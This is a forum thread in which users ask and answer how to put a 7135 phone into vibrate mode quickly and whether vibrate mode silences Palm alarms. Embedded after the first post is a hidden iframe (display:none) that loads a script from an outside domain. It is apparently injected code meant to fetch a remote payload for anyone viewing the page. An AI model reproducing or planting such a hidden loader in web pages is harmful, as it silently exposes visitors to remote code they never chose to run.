+ Reply to Thread
    db

any quick switch between ring & vibrate?

my 7135 arrived saturday - HOORAY!

after searching the archives and not finding an answer, i'm risking this post.

my previous cell phones have had some way to switch the phone quickly to vibrate or back to ringer. is there a way to do that on the 7135 without going to the phone prefs each time? maybe needs a hack?

thanks,
    -db<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

db -

There are two buttons on the left hand side of the 7135, which are used to increase/decrease ringer volume. If you press and hold the bottom button, you will set your phone on vibrate mode. You can do this with the lid open or closed.

-Brian

db

THANKS for the info

is this volume switch function documented anywhere? i've looked thru the manual and haven't found it. i'd love to learn all these trick.

thanks so much. this forum is GREAT!.

-db

Originally posted by bsecrest
    db -

There are two buttons on the left hand side of the 7135, which are used to increase/decrease ringer volume. If you press and hold the bottom button, you will set your phone on vibrate mode. You can do this with the lid open or closed.

-Brian
    When the 7135 is vibrate mode, does this also silence palm alarms? I had asked this question months ago, but it was never answered for me.

TIA,

t

Originally posted by terryg
    When the 7135 is vibrate mode, does this also silence palm alarms? I had asked this question months ago, but it was never answered for me.

TIA,

t
    Yes, it does.

Alan

Is there any way of just putting the phone into Vibrate mode and still keeping the alarms where they are at ??

Originally posted by babacksh
    Is there any way of just putting the phone into Vibrate mode and still keeping the alarms where they are at ??
    Yes, but you have to go into the phone prefs and change it under incoming calls to vibrate only.
    Please visit my picture site: Robert-O-Rama :)

Thats what I didn't want to do.

Oh well, thanks.

Anyone using Diddlebug, and succeeded in getting diddlebug to vibrate alarms. I can either have them sound, or if phone is on vibrate, alarm pops up, but no sound and no vibrate....